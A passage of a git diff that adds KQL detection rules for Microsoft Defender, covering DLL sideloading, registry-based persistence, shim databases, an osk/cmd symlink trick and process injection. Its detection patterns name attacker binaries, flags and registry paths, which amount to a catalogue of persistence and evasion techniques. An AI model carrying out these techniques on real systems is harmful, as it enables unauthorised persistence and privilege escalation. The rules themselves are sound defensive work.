"C:\\Windows\\Microsoft.NET\\FrameworkArm\\" or FolderPath startswith "C:\\Windows\\Microsoft.NET\\FrameworkArm64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_dll_sideloading_using_coregen_exe.kql b/KQL/rules/Privilege Escalation/potential_dll_sideloading_using_coregen_exe.kql new file mode 100644 index 00000000..ee418ee3 --- /dev/null +++ b/KQL/rules/Privilege Escalation/potential_dll_sideloading_using_coregen_exe.kql @@ -0,0 +1,10 @@ +// Title: Potential DLL Sideloading Using Coregen.exe +// Author: frack113 +// Date: 2022-12-31 +// Level: medium +// Description: Detect usage of the "coregen.exe" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1218, attack.t1055 + +DeviceImageLoadEvents +| where InitiatingProcessFolderPath endswith "\\coregen.exe" and (not((FolderPath startswith "C:\\Program Files (x86)\\Microsoft Silverlight\\" or FolderPath startswith "C:\\Program Files\\Microsoft Silverlight\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_dll_sideloading_via_deviceenroller_exe.kql b/KQL/rules/Privilege Escalation/potential_dll_sideloading_via_deviceenroller_exe.kql new file mode 100644 index 00000000..43108576 --- /dev/null +++ b/KQL/rules/Privilege Escalation/potential_dll_sideloading_via_deviceenroller_exe.kql @@ -0,0 +1,12 @@ +// Title: Potential DLL Sideloading Via DeviceEnroller.EXE +// Author: @gott_cyber +// Date: 2022-08-29 +// Level: medium +// Description: Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. This non-existent DLL file is named "ShellChromeAPI.dll". +Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 + +DeviceProcessEvents +| where ProcessCommandLine contains "/PhoneDeepLink" and (FolderPath endswith "\\deviceenroller.exe" or ProcessVersionInfoOriginalFileName =~ "deviceenroller.exe") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_dll_sideloading_via_vmware_xfer.kql b/KQL/rules/Privilege Escalation/potential_dll_sideloading_via_vmware_xfer.kql new file mode 100644 index 00000000..afa1f482 --- /dev/null +++ b/KQL/rules/Privilege Escalation/potential_dll_sideloading_via_vmware_xfer.kql @@ -0,0 +1,12 @@ +// Title: Potential DLL Sideloading Via VMware Xfer +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-02 +// Level: high +// Description: Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 +// False Positives: +// - Unlikely + +DeviceImageLoadEvents +| where (FolderPath endswith "\\glib-2.0.dll" and InitiatingProcessFolderPath endswith "\\VMwareXferlogs.exe") and (not(FolderPath startswith "C:\\Program Files\\VMware\\")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_initial_access_via_dll_search_order_hijacking.kql b/KQL/rules/Privilege Escalation/potential_initial_access_via_dll_search_order_hijacking.kql new file mode 100644 index 00000000..20104c27 --- /dev/null +++ b/KQL/rules/Privilege Escalation/potential_initial_access_via_dll_search_order_hijacking.kql @@ -0,0 +1,10 @@ +// Title: Potential Initial Access via DLL Search Order Hijacking +// Author: Tim Rauch (rule), Elastic (idea) +// Date: 2022-10-21 +// Level: medium +// Description: Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1566, attack.t1566.001, attack.initial-access, attack.t1574, attack.t1574.001, attack.defense-evasion + +DeviceFileEvents +| where ((InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\MSACCESS.EXE" or InitiatingProcessFolderPath endswith "\\MSPUB.EXE" or InitiatingProcessFolderPath endswith "\\fltldr.exe" or InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\curl.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and (FolderPath contains "\\Microsoft\\OneDrive\\" or FolderPath contains "\\Microsoft OneDrive\\" or FolderPath contains "\\Microsoft\\Teams\\" or FolderPath contains "\\Local\\slack\\app-" or FolderPath contains "\\Local\\Programs\\Microsoft VS Code\\") and (FolderPath contains "\\Users\\" and FolderPath contains "\\AppData\\") and FolderPath endswith ".dll") and (not((InitiatingProcessFolderPath endswith "\\cmd.exe" and (FolderPath contains "\\Users\\" and FolderPath contains "\\AppData\\" and FolderPath contains "\\Microsoft\\OneDrive\\" and FolderPath contains "\\api-ms-win-core-")))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_linux_process_code_injection_via_dd_utility.kql b/KQL/rules/Privilege Escalation/potential_linux_process_code_injection_via_dd_utility.kql new file mode 100644 index 00000000..4751f88a --- /dev/null +++ b/KQL/rules/Privilege Escalation/potential_linux_process_code_injection_via_dd_utility.kql @@ -0,0 +1,10 @@ +// Title: Potential Linux Process Code Injection Via DD Utility +// Author: Joseph Kamau +// Date: 2023-12-01 +// Level: medium +// Description: Detects the injection of code by overwriting the memory map of a Linux process using the "dd" Linux command. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055.009 + +DeviceProcessEvents +| where (ProcessCommandLine contains "of=" and ProcessCommandLine contains "/proc/" and ProcessCommandLine contains "/mem") and FolderPath endswith "/dd" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_mpclient_dll_sideloading.kql b/KQL/rules/Privilege Escalation/potential_mpclient_dll_sideloading.kql new file mode 100644 index 00000000..c84c2e75 --- /dev/null +++ b/KQL/rules/Privilege Escalation/potential_mpclient_dll_sideloading.kql @@ -0,0 +1,12 @@ +// Title: Potential Mpclient.DLL Sideloading +// Author: Bhabesh Raj +// Date: 2022-08-02 +// Level: high +// Description: Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 +// False Positives: +// - Unlikely + +DeviceImageLoadEvents +| where (FolderPath endswith "\\mpclient.dll" and (InitiatingProcessFolderPath endswith "\\MpCmdRun.exe" or InitiatingProcessFolderPath endswith "\\NisSrv.exe")) and (not((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Windows Defender\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Security Client\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Windows Defender\\" or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_mpclient_dll_sideloading_via_defender_binaries.kql b/KQL/rules/Privilege Escalation/potential_mpclient_dll_sideloading_via_defender_binaries.kql new file mode 100644 index 00000000..04c13655 --- /dev/null +++ b/KQL/rules/Privilege Escalation/potential_mpclient_dll_sideloading_via_defender_binaries.kql @@ -0,0 +1,12 @@ +// Title: Potential Mpclient.DLL Sideloading Via Defender Binaries +// Author: Bhabesh Raj +// Date: 2022-08-01 +// Level: high +// Description: Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (FolderPath endswith "\\MpCmdRun.exe" or FolderPath endswith "\\NisSrv.exe") and (not((FolderPath startswith "C:\\Program Files (x86)\\Windows Defender\\" or FolderPath startswith "C:\\Program Files\\Microsoft Security Client\\" or FolderPath startswith "C:\\Program Files\\Windows Defender\\" or FolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_persistence_attempt_via_existing_service_tampering.kql b/KQL/rules/Privilege Escalation/potential_persistence_attempt_via_existing_service_tampering.kql new file mode 100644 index 00000000..a138f10c --- /dev/null +++ b/KQL/rules/Privilege Escalation/potential_persistence_attempt_via_existing_service_tampering.kql @@ -0,0 +1,10 @@ +// Title: Potential Persistence Attempt Via Existing Service Tampering +// Author: Sreeman +// Date: 2020-09-29 +// Level: medium +// Description: Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1543.003, attack.t1574.011 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "sc " and ProcessCommandLine contains "config " and ProcessCommandLine contains "binpath=") or (ProcessCommandLine contains "sc " and ProcessCommandLine contains "failure" and ProcessCommandLine contains "command=")) or ((ProcessCommandLine contains ".sh" or ProcessCommandLine contains ".exe" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".bin$" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".cmd" or ProcessCommandLine contains ".js" or ProcessCommandLine contains ".msh$" or ProcessCommandLine contains ".reg$" or ProcessCommandLine contains ".scr" or ProcessCommandLine contains ".ps" or ProcessCommandLine contains ".vb" or ProcessCommandLine contains ".jar" or ProcessCommandLine contains ".pl") and ((ProcessCommandLine contains "reg " and ProcessCommandLine contains "add " and ProcessCommandLine contains "FailureCommand") or (ProcessCommandLine contains "reg " and ProcessCommandLine contains "add " and ProcessCommandLine contains "ImagePath"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_persistence_attempt_via_run_keys_using_reg_exe.kql b/KQL/rules/Privilege Escalation/potential_persistence_attempt_via_run_keys_using_reg_exe.kql new file mode 100644 index 00000000..e89c136c --- /dev/null +++ b/KQL/rules/Privilege Escalation/potential_persistence_attempt_via_run_keys_using_reg_exe.kql @@ -0,0 +1,14 @@ +// Title: Potential Persistence Attempt Via Run Keys Using Reg.EXE +// Author: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2021-06-28 +// Level: medium +// Description: Detects suspicious command line reg.exe tool adding key to RUN key in Registry +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons. +// - Legitimate administrator sets up autorun keys for legitimate reasons. +// - Discord + +DeviceProcessEvents +| where (ProcessCommandLine contains "Software\\Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains "\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run") and (ProcessCommandLine contains "reg" and ProcessCommandLine contains " add ") and FolderPath endswith "\\reg.exe" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_persistence_using_debugpath.kql b/KQL/rules/Privilege Escalation/potential_persistence_using_debugpath.kql new file mode 100644 index 00000000..10361e4b --- /dev/null +++ b/KQL/rules/Privilege Escalation/potential_persistence_using_debugpath.kql @@ -0,0 +1,10 @@ +// Title: Potential Persistence Using DebugPath +// Author: frack113 +// Date: 2022-07-27 +// Level: medium +// Description: Detects potential persistence using Appx DebugPath +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015 + +DeviceRegistryEvents +| where (RegistryKey contains "Classes\\ActivatableClasses\\Package\\Microsoft." and RegistryKey endswith "\\DebugPath") or (RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\PackagedAppXDebug\\Microsoft." and RegistryKey endswith "\\(Default)") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_app_paths_default_property.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_app_paths_default_property.kql new file mode 100644 index 00000000..23a1da4f --- /dev/null +++ b/KQL/rules/Privilege Escalation/potential_persistence_via_app_paths_default_property.kql @@ -0,0 +1,16 @@ +// Title: Potential Persistence Via App Paths Default Property +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-10 +// Level: high +// Description: Detects changes to the "Default" property for keys located in the \Software\Microsoft\Windows\CurrentVersion\App Paths\ registry. Which might be used as a method of persistence +The entries found under App Paths are used primarily for the following purposes. +First, to map an application's executable file name to that file's fully qualified path. +Second, to prepend information to the PATH environment variable on a per-application, per-process basis. + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.012 +// False Positives: +// - Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it) + +DeviceRegistryEvents +| where (RegistryValueData contains "\\Users\\Public" or RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "\\Windows\\Temp\\" or RegistryValueData contains "\\Desktop\\" or RegistryValueData contains "\\Downloads\\" or RegistryValueData contains "%temp%" or RegistryValueData contains "%tmp%" or RegistryValueData contains "iex" or RegistryValueData contains "Invoke-" or RegistryValueData contains "rundll32" or RegistryValueData contains "regsvr32" or RegistryValueData contains "mshta" or RegistryValueData contains "cscript" or RegistryValueData contains "wscript" or RegistryValueData contains ".bat" or RegistryValueData contains ".hta" or RegistryValueData contains ".dll" or RegistryValueData contains ".ps1") and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths" and (RegistryKey endswith "(Default)" or RegistryKey endswith "Path") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_appcompat_registerapprestart_layer.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_appcompat_registerapprestart_layer.kql new file mode 100644 index 00000000..0127fdbd --- /dev/null +++ b/KQL/rules/Privilege Escalation/potential_persistence_via_appcompat_registerapprestart_layer.kql @@ -0,0 +1,15 @@ +// Title: Potential Persistence Via AppCompat RegisterAppRestart Layer +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-01-01 +// Level: medium +// Description: Detects the setting of the REGISTERAPPRESTART compatibility layer on an application. +This compatibility layer allows an application to register for restart using the "RegisterApplicationRestart" API. +This can be potentially abused as a persistence mechanism. + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.011 +// False Positives: +// - Legitimate applications making use of this feature for compatibility reasons + +DeviceRegistryEvents +| where RegistryValueData contains "REGISTERAPPRESTART" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Layers*" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_globalflags.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_globalflags.kql new file mode 100644 index 00000000..63c6d8a9 --- /dev/null +++ b/KQL/rules/Privilege Escalation/potential_persistence_via_globalflags.kql @@ -0,0 +1,10 @@ +// Title: Potential Persistence Via GlobalFlags +// Author: Karneades, Jonhnathan Ribeiro, Florian Roth +// Date: 2018-04-11 +// Level: high +// Description: Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1546.012, car.2013-01-002 + +DeviceRegistryEvents +| where (RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion*" and RegistryKey endswith "\\Image File Execution Options*" and RegistryKey contains "\\GlobalFlag") or ((RegistryKey contains "\\ReportingMode" or RegistryKey contains "\\MonitorProcess") and (RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion*" and RegistryKey endswith "\\SilentProcessExit*")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_logon_scripts_commandline.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_logon_scripts_commandline.kql new file mode 100644 index 00000000..c278167e --- /dev/null +++ b/KQL/rules/Privilege Escalation/potential_persistence_via_logon_scripts_commandline.kql @@ -0,0 +1,12 @@ +// Title: Potential Persistence Via Logon Scripts - CommandLine +// Author: Tom Ueltschi (@c_APT_ure) +// Date: 2019-01-12 +// Level: high +// Description: Detects the addition of a new LogonScript to the registry value "UserInitMprLogonScript" for potential persistence +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1037.001 +// False Positives: +// - Legitimate addition of Logon Scripts via the command line by administrators or third party tools + +DeviceProcessEvents +| where ProcessCommandLine contains "UserInitMprLogonScript" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_logon_scripts_registry.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_logon_scripts_registry.kql new file mode 100644 index 00000000..8f7b1c8c --- /dev/null +++ b/KQL/rules/Privilege Escalation/potential_persistence_via_logon_scripts_registry.kql @@ -0,0 +1,12 @@ +// Title: Potential Persistence Via Logon Scripts - Registry +// Author: Tom Ueltschi (@c_APT_ure) +// Date: 2019-01-12 +// Level: medium +// Description: Detects creation of "UserInitMprLogonScript" registry value which can be used as a persistence method by malicious actors +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.t1037.001, attack.persistence, attack.lateral-movement +// False Positives: +// - Investigate the contents of the "UserInitMprLogonScript" value to determine of the added script is legitimate + +DeviceRegistryEvents +| where ActionType =~ "RegistryKeyCreated" and RegistryKey contains "UserInitMprLogonScript" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_microsoft_compatibility_appraiser.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_microsoft_compatibility_appraiser.kql new file mode 100644 index 00000000..23c7e4c2 --- /dev/null +++ b/KQL/rules/Privilege Escalation/potential_persistence_via_microsoft_compatibility_appraiser.kql @@ -0,0 +1,12 @@ +// Title: Potential Persistence Via Microsoft Compatibility Appraiser +// Author: Sreeman +// Date: 2020-09-29 +// Level: medium +// Description: Detects manual execution of the "Microsoft Compatibility Appraiser" task via schtasks. +In order to trigger persistence stored in the "\AppCompatFlags\TelemetryController" registry key. + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005 + +DeviceProcessEvents +| where (ProcessCommandLine contains "run " and ProcessCommandLine contains "\\Application Experience\\Microsoft Compatibility Appraiser") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll.kql new file mode 100644 index 00000000..1b1339e5 --- /dev/null +++ b/KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll.kql @@ -0,0 +1,11 @@ +// Title: Potential Persistence Via Netsh Helper DLL +// Author: Victor Sergeev, oscd.community +// Date: 2019-10-25 +// Level: medium +// Description: Detects the execution of netsh with "add helper" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed. + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.007, attack.s0108 + +DeviceProcessEvents +| where (ProcessCommandLine contains "add" and ProcessCommandLine contains "helper") and (ProcessVersionInfoOriginalFileName =~ "netsh.exe" or FolderPath endswith "\\netsh.exe") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll_registry.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll_registry.kql new file mode 100644 index 00000000..a3f64d2d --- /dev/null +++ b/KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll_registry.kql @@ -0,0 +1,13 @@ +// Title: Potential Persistence Via Netsh Helper DLL - Registry +// Author: Anish Bogati +// Date: 2023-11-28 +// Level: medium +// Description: Detects changes to the Netsh registry key to add a new DLL value. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.007 +// False Positives: +// - Legitimate helper added by different programs and the OS + +DeviceRegistryEvents +| where (RegistryValueData contains ".dll" and RegistryKey contains "\\SOFTWARE\\Microsoft\\NetSh") and (not(((RegistryValueData in~ ("ipmontr.dll", "iasmontr.dll", "ippromon.dll")) and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_outlook_loadmacroprovideronboot_setting.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_outlook_loadmacroprovideronboot_setting.kql new file mode 100644 index 00000000..dae58d0d --- /dev/null +++ b/KQL/rules/Privilege Escalation/potential_persistence_via_outlook_loadmacroprovideronboot_setting.kql @@ -0,0 +1,10 @@ +// Title: Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-04-05 +// Level: high +// Description: Detects the modification of Outlook setting "LoadMacroProviderOnBoot" which if enabled allows the automatic loading of any configured VBA project/module +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.command-and-control, attack.t1137, attack.t1008, attack.t1546 + +DeviceRegistryEvents +| where RegistryValueData contains "0x00000001" and RegistryKey endswith "\\Outlook\\LoadMacroProviderOnBoot" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_plistbuddy.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_plistbuddy.kql new file mode 100644 index 00000000..af65414b --- /dev/null +++ b/KQL/rules/Privilege Escalation/potential_persistence_via_plistbuddy.kql @@ -0,0 +1,10 @@ +// Title: Potential Persistence Via PlistBuddy +// Author: Sohan G (D4rkCiph3r) +// Date: 2023-02-18 +// Level: high +// Description: Detects potential persistence activity using LaunchAgents or LaunchDaemons via the PlistBuddy utility +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1543.001, attack.t1543.004 + +DeviceProcessEvents +| where (ProcessCommandLine contains "LaunchAgents" or ProcessCommandLine contains "LaunchDaemons") and (ProcessCommandLine contains "RunAtLoad" and ProcessCommandLine contains "true") and FolderPath endswith "/PlistBuddy" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_powershell_search_order_hijacking_task.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_powershell_search_order_hijacking_task.kql new file mode 100644 index 00000000..6c70f9b8 --- /dev/null +++ b/KQL/rules/Privilege Escalation/potential_persistence_via_powershell_search_order_hijacking_task.kql @@ -0,0 +1,10 @@ +// Title: Potential Persistence Via Powershell Search Order Hijacking - Task +// Author: pH-T (Nextron Systems), Florian Roth (Nextron Systems) +// Date: 2022-04-08 +// Level: high +// Description: Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell "Get-Variable" technique as seen being used in Colibri Loader +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001 + +DeviceProcessEvents +| where (ProcessCommandLine endswith " -windowstyle hidden" or ProcessCommandLine endswith " -w hidden" or ProcessCommandLine endswith " -ep bypass" or ProcessCommandLine endswith " -noni") and (InitiatingProcessCommandLine contains "-k netsvcs" and InitiatingProcessCommandLine contains "-s Schedule") and InitiatingProcessFolderPath =~ "C:\\WINDOWS\\System32\\svchost.exe" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_scrobj_dll_com_hijacking.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_scrobj_dll_com_hijacking.kql new file mode 100644 index 00000000..202552f7 --- /dev/null +++ b/KQL/rules/Privilege Escalation/potential_persistence_via_scrobj_dll_com_hijacking.kql @@ -0,0 +1,12 @@ +// Title: Potential Persistence Via Scrobj.dll COM Hijacking +// Author: frack113 +// Date: 2022-08-20 +// Level: medium +// Description: Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015 +// False Positives: +// - Legitimate use of the dll. + +DeviceRegistryEvents +| where RegistryValueData =~ "C:\\WINDOWS\\system32\\scrobj.dll" and RegistryKey endswith "InprocServer32\\(Default)" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_shim_database_in_uncommon_location.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_shim_database_in_uncommon_location.kql new file mode 100644 index 00000000..e2da4396 --- /dev/null +++ b/KQL/rules/Privilege Escalation/potential_persistence_via_shim_database_in_uncommon_location.kql @@ -0,0 +1,10 @@ +// Title: Potential Persistence Via Shim Database In Uncommon Location +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-01 +// Level: high +// Description: Detects the installation of a new shim database where the file is located in a non-default location +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.011 + +DeviceRegistryEvents +| where (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB*" and RegistryKey contains "\\DatabasePath") and (not(RegistryValueData contains ":\\Windows\\AppPatch\\Custom")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_shim_database_modification.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_shim_database_modification.kql new file mode 100644 index 00000000..4b9d4822 --- /dev/null +++ b/KQL/rules/Privilege Escalation/potential_persistence_via_shim_database_modification.kql @@ -0,0 +1,14 @@ +// Title: Potential Persistence Via Shim Database Modification +// Author: frack113 +// Date: 2021-12-30 +// Level: medium +// Description: Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. +The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.011 +// False Positives: +// - Legitimate custom SHIM installations will also trigger this rule + +DeviceRegistryEvents +| where (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB*" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom*") and (not((RegistryValueData =~ "" or RegistryValueData =~ "(Empty)" or isnull(RegistryValueData)))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_privilege_escalation_using_symlink_between_osk_and_cmd.kql b/KQL/rules/Privilege Escalation/potential_privilege_escalation_using_symlink_between_osk_and_cmd.kql new file mode 100644 index 00000000..1ef1cf25 --- /dev/null +++ b/KQL/rules/Privilege Escalation/potential_privilege_escalation_using_symlink_between_osk_and_cmd.kql @@ -0,0 +1,10 @@ +// Title: Potential Privilege Escalation Using Symlink Between Osk and Cmd +// Author: frack113 +// Date: 2022-12-11 +// Level: high +// Description: Detects the creation of a symbolic link between "cmd.exe" and the accessibility on-screen keyboard binary (osk.exe) using "mklink". This technique provides an elevated command prompt to the user from the login screen without the need to log in. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.008 + +DeviceProcessEvents +| where (ProcessCommandLine contains "mklink" and ProcessCommandLine contains "\\osk.exe" and ProcessCommandLine contains "\\cmd.exe") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_process_injection_via_msra_exe.kql b/KQL/rules/Privilege Escalation/potential_process_injection_via_msra_exe.kql new file mode 100644 index 00000000..a03fbb20 --- /dev/null +++ b/KQL/rules/Privilege Escalation/potential_process_injection_via_msra_exe.kql @@ -0,0 +1,12 @@ +// Title: Potential Process Injection Via Msra.EXE +// Author: Alexander McDonald +// Date: 2022-06-24 +// Level: high +// Description: Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055 +// False Positives: +// - Legitimate use of Msra.exe + +DeviceProcessEvents +| where (FolderPath endswith "\\arp.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nslookup.exe" or FolderPath endswith "\\route.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\whoami.exe") and InitiatingProcessCommandLine endswith "msra.exe" and InitiatingProcessFolderPath endswith "\\msra.exe" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_psfactorybuffer_com_hijacking.kql b/KQL/rules/Privilege Escalation/potential_psfactorybuffer_com_hijacking.kql new file mode 100644 index 00000000..4fc7dbc5 --- /dev/null +++ 